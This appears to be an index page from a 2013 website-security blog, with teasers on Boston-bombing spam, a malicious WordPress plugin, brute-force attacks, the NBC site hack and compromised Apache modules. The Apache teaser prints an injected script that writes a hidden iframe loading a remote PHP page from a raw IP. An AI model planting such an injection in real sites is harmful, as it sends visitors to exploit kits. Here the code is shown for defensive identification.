Cyber Criminals Take Advantage of Recent Boston Attack with SPAM

It pains me to write about this at all, but as despicable as this might appear, cyber criminals have started to take advantage of those that have been affected by the recent tragedy in Boston – which pretty much means everyone with a pulse.

Trend Micro is reporting –

Mary Ermitano-Aquino noted a spam outbreak of more than 9,000 Blackhole Exploit Kit spammed messages, all related to the said tragedy that killed at least three people and injured many more. Some of the spammed messages used the subjects “2 Explosions at Boston Marathon,” “Aftermath to explosion at Boston Marathon,” “Boston Explosion Caught on Video,” and “Video of Explosion at the Boston Marathon 2013″ to name a few.

Sophos NakedSecurity is also reporting similar upticks –

Messages spammed out by attackers claim to contain a link to video footage of Monday’s terrorist activity in Boston, with subject lines such as “2 Explosions at Boston Marathon”…..If you make the mistake of clicking on the link, however, you are taken to a website which – while showing you genuine YouTube videos of the the horrific incident – attempts to infect your computer with a Windows Trojan horse that Sophos products detect as Troj/Tepfer-Q.

Unfortunately this is not just specific to emails, it appears that this is bleeding into all mediums, to include Facebook and Twitter. Aside from it being highly disturbing, all we can do is spread the word so that friends and families are not affected while emotionally distraught.

I plead with you that if you want to contribute and / or are interested in what is going on avoid clicking on social media and email links and go directly to known media outlets. Also, please don’t donate to random organizations, stick with known reputable organizations that you can verify.

WordPress Malicious Plugin – WPPPM – Abusing 404 Redirects with SEO Poisoning

Bruno Borges, of our security team, came across an interesting case this week, in which a WordPress plugin was abusing the 404 rewrite rules and redirecting all traffic to SPAM pages advertising a variety of things, the most common being:

FACTUAL STUDY: HYDROXYCITRIC ACID IN GARCINIA CAMBOGIA BURNS FAT.

The way it works is interesting, by default most would never realize they are even infected. The plugin is designed only to redirect incoming traffic that accidentally goes to a page that doesn’t exist. In most cases it would generates what we know as 404 pages, or state something like, Sorry this page doesn’t exist, etc… Well in this case, you’d be greeted with something like the following:

Read More

Brute Force Attacks and Their Consequences

There is a lot of interesting discussion going on at the moment across the interwebs on the intention of the latest string of Brute Force attacks, much of which I find very interesting. While I can’t repudiate what is being said, I can add my own insight into the anatomy post attack success.

How Are These Attacks Happening

First, let’s address the first, and most important piece of information, the how. What we know, based on the data we reported earlier is that a very large majority of the attacks are coming from local PC boxes. How do we know? We’re seeing the IP’s and their incoming signatures.

A botnet is a collection of internet-connected programs communicating with other similar programs in order to perform tasks. – Wikipedia

What is the end-game?


Read More

Protecting Against WordPress Brute-Force Attacks

It was not long ago that I was sitting on a call with other members of the WordPress community in which we were talking abou brute-force. When asked why WordPress core didn’t offer more out of the box features to address the issue, the response was it’s just not a relavent issue.

As interesting a response as that was, the latest trends seem to contradict that statement head on. It goes to show us that with the technological improvements things like latency and other network considerations are becoming less of a barrier to entry for attackers.

Web Based Brute Force Attacks Are Here

As if we really needed any tangible evidence of such a prominent issue, the first large-scale issue of such attacks first presented itself in October of 2012 when WordPress.com disclosed that some 50,000 sites were compromised using a similar attack:

Per their incident handling process they identified a brute force like attack which made use of a list of compromised email / password combinations derived from a third-party application[s].


Read More

WordPress Security Presentation by Tony Perez

Tomorrow I will be flying to my hometown (Miami) to give a Website Security presentation to a bunch of enthusiastic online professionals at an event called WordCamp. If you’re not familiar with these events, they are global events put together by the local populace to focus on a specific platform – WordPress. The event is called WordCamp Miami 2013, if you plan to be there definitely look me up.

I will be presenting at 1400 (EST), also known as 2:00 pm to most.

I will be volunteering at the Happiness Bar right after my talk at 1445 (EST), 2:45 pm.

If you’re interested, they are going to be live-streaming the event and you’re more than welcome to watch.

Website Malware – Fixing Joomla SPAM Hacks – Conditional Payloads

Our Senior Malware Engineer, Fioravante Cavallari, is at it again. I think he has made it his personal mission in life to expel all Joomla hacks, he loves them that much – true story.. ;)

In all seriousness, he found another gem yesterday. It’s well written; it includes comments explaining what they are doing, uses proper syntax, it was broken up and sprinkled throughout another good file generating no errors, it wasn’t obfuscated and it leverages good variable naming conventions. What more can we ask for, right?!?!?!

Don’t ask how we found it, a true gentlemen never discloses his nightly affairs.

The Pretty Payload – Nice Conditional Malware

A few months ago I wrote about Conditional Malware, we’d categorize this one into the same family. In my post it was a very simple explanation and code base, you could clearly see the IP’s being filtered and what it was doing, here we have to think a bit. Remember, you’re not likely to find it in tact like this, it’ll likely be broken and sprinkled through out your file. Here you go:

Read More

NBC Website HACKED – Be Careful Surfing

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

Read More

Various Shades of Malware – Abusing Your Resources

We often write about very clear cut cases of malware activity. The attacker is leveraging your traffic, redirecting it to other locations, or injecting things like iFrames in an attempt to perform some type of drive-by-download. These are obviously very clear cut cases of malware and nefarious activities. But what about others?

By others I mean abusing system resources. This can be done through bot networks, spam emails and even using your box as a proxy. None of these are things you’ll ever pick up via any remote scanner as they never present themselves remotely. It’s also why we have to start evolving our ideals and remediation to move beyond the application tier and focus on the web server.

A perfect example is what we came across today.

In this example the attacker has injected a file called gate.php, when you navigate to via your URI you come see this:

Read More

Web Server Compromise – Debian Distro – Identify and Remove Corrupt Apache Modules

Came across another server compromise this week. Client was complaining that the following kept being injected into their JavaScript files:

document.write("<style.vb4brk { position:absolute; left:-1655px; top:-1476px} </style> 
<div class="vb4rk"><iframe 
src="httx:// 149.47.154.253/fee1f3119b234cb79f953e92281b12af/q.php" width="231" height="330">
</iframe></div>'); /*!

Fortunately, the client was working off a VPS. Doing so allowed us to dig deeper into the server and better address the issue. Looking at the server we quickly realized that a bad module had been injected. Unfortunately, because this was a Debian distribution, as such you can’t run the commands we provided in our last post.

Read More

Website Security – The Importance of Access

Not sure why more emphasis isn’t put on access, but I’ll spend some time on it today. Understand though that this emphasis is not just something pulled out of the clouds. Instead it has come from months of thought and research – courtesy of client environments, enterprise incident handling cases and our own honey pots.

Website Security - Importance of Access

The Importance of Access

For some reason, what I have gathered, is that website owners, in their minds, think they are really ingenious. We think that what we know, no one else knows; the harsh reality is that’s so far from the truth. The are also those that buy into the idea that information security is an absolute, if only it were. Website owners have to learn to set their expectations, the InfoSec domain is about risk reduction. That is the first thing to understand.

While software vulnerabilities are a real threat, without tangible evidence, I am willing to bet that access is gaining ground on software vulnerabilities more than most realize. Still working on evidence to support this. A good thing to remember is that as a product becomes more secure, and the attack vectors decrease, access only increases in importance.

Read More